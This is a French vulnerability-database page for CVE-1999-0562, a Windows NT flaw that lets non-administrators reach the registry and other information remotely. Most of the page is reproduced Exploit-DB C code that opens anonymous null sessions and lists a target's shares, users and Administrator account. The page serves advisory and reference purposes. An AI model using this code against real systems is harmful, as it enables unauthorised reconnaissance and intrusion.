CVE-1999-0562 : Détail

CVE-1999-0562

8.85%V4
Network
2000-02-04
04h00 +00:00
2024-08-01
16h41 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The registry in Windows NT can be accessed remotely by users who are not administrators.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 19372

Date de publication : 1999-06-27 22h00 +00:00
Auteur : J D Glaser
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/494/info By establishing a Null session with an NT host, an intruder can gain the name of even a renamed Administrator account. This is because even Null sessions are added to the Everyone group for the duration of the connection. This was done so that hosts not in the domain could still use MS Networking's browser functions. First - making a NULL Session connection One way to this is by using the Net Use command with an empty password. Programmatically, it looks like this.... //This function called from dialog that fills listbox with connections BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg) { //Setup for UNICODE char* pTemp = TargetHost.GetBuffer(256); WCHAR wszServ[256]; LPWSTR Server = NULL; //Convert to Unicode MultiByteToWideChar(CP_ACP, 0, pTemp, strlen(pTemp)+1, wszServ, sizeof(wszServ)/sizeof(wszServ[0]) ); //Create the IPC$ share connection string we need Server = wszServ; LPCWSTR szIpc = L"\\IPC$"; WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL DWORD dwServNameLen; DWORD dwRC; //Setup Win32 structures and variables we need NET_API_STATUS nas; USE_INFO_2 ui2; SHARE_INFO_1* pSHInfo1 = NULL; DWORD dwEntriesRead; DWORD dwTotalEntries; //Set up handles to tree control to insert connection results HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot; char sharename[256]; char remark[256]; if(Server == NULL || *Server == L'\0') { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } dwServNameLen = lstrlenW( Server ); //Test for various errors in connection string and recover if(Server[0] != L'\\' && Server[1] != L'\\') { // prepend slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } if(lstrcatW(RemoteResource, Server) == NULL) return FALSE; if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE; //Start with clean memory ZeroMemory(&ui2, sizeof(ui2)); //Fill in the Win32 network structure we need to use connect API ui2.ui2_local = NULL; ui2.ui2_remote = (LPTSTR) RemoteResource; ui2.ui2_asg_type = USE_IPC; ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL ui2.ui2_username = (LPTSTR) L""; ui2.ui2_domainname = (LPTSTR) L""; //MAKE THE NULL SESSION CALL nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT); } //THIS IS WHERE NT HANDS OUT IT INFORMATION nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwTotalEntries, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { if(dwTotalEntries > 0) { shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST); userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST); adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST); } for(int x=0; x<(int)dwTotalEntries; x++) { // Convert back to ANSI WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_netname, -1, sharename, 256, NULL, NULL ); WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1, remark, 256, NULL, NULL ); CString ShareDetails = sharename; ShareDetails = ShareDetails + " - " + remark; //fill the tree with connect info attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST); pSHInfo1++; } } //My Wrapper function for listing users - see below DoNetUserEnum(Server, pDlg, userRoot, adminRoot); //WE ARE DONE, SO KILL THE CONNECTION nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0); TargetHost.ReleaseBuffer(); SetLastError( nas ); return FALSE; } The following function is how one can programmatically determine the administrator status of an account...... bool GetAdmin(char* pServer, char* pUser, CString& Name) { BOOL fAdmin = FALSE; DWORD dwDomainName,dwSize,dwAdminVal; SID_NAME_USE use; PSID pUserSID = NULL; // SID for user int rc; int iSubCount; bool bFoundHim = 0; dwDomainName = 256; dwSize = 0; dwAdminVal = 0; iSubCount = 0; //Call API for buffer size since we don't know size beforehand rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); rc = GetLastError(); //Allocate a larger buffer if(rc == ERROR_INSUFFICIENT_BUFFER) { pUserSID = (PSID) malloc(dwSize); //Repeat call now that we have the right size buffer rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); } //Scan the SIDS for the golden key - ADMIN == 500 //Get a count of SID's iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); //Admin SID is the last element in the count dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1)); if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN { Name.Format("Admin is %s\\%s\n", szDomainName, pUser); bFoundHim = true; } delete pUserSID; return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE } Wrapper for Listing the user accounts..... void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot) { USER_INFO_10 *pUserbuf, *pCurUser; DWORD dwRead, dwRemaining, dwResume, dwRC; char userName[256]; char userServer[256]; dwResume = 0; if(pServer[0] != L'\\' && pServer[1] != L'\\') { //Start sting with correct UNC slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return; } if(lstrcatW(RemoteResource, pServer) == NULL) return; do { pUserbuf = NULL; //THIS IS THE API THE NT USES TO HAND OUT IT's LIST dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024, &dwRead, &dwRemaining, &dwResume); if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS) break; DWORD i; for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) { // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL ); // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pServer, -1, userServer, 256, NULL, NULL ); if(!GotAdmin) { //use char strings CString Admin; GotAdmin = GetAdmin(userServer, userName, Admin); if(GotAdmin) { Admin.TrimRight(); HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST); pDlg->m_Victims.EnsureVisible(adminChild); } } CString strUserName = userName; pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST); } if (pUserbuf != NULL) NetApiBufferFree(pUserbuf); } while (dwRC == ERROR_MORE_DATA); if (dwRC != ERROR_SUCCESS) printf("NUE() returned %lu\n", dwRC); }

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version *

Références

Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.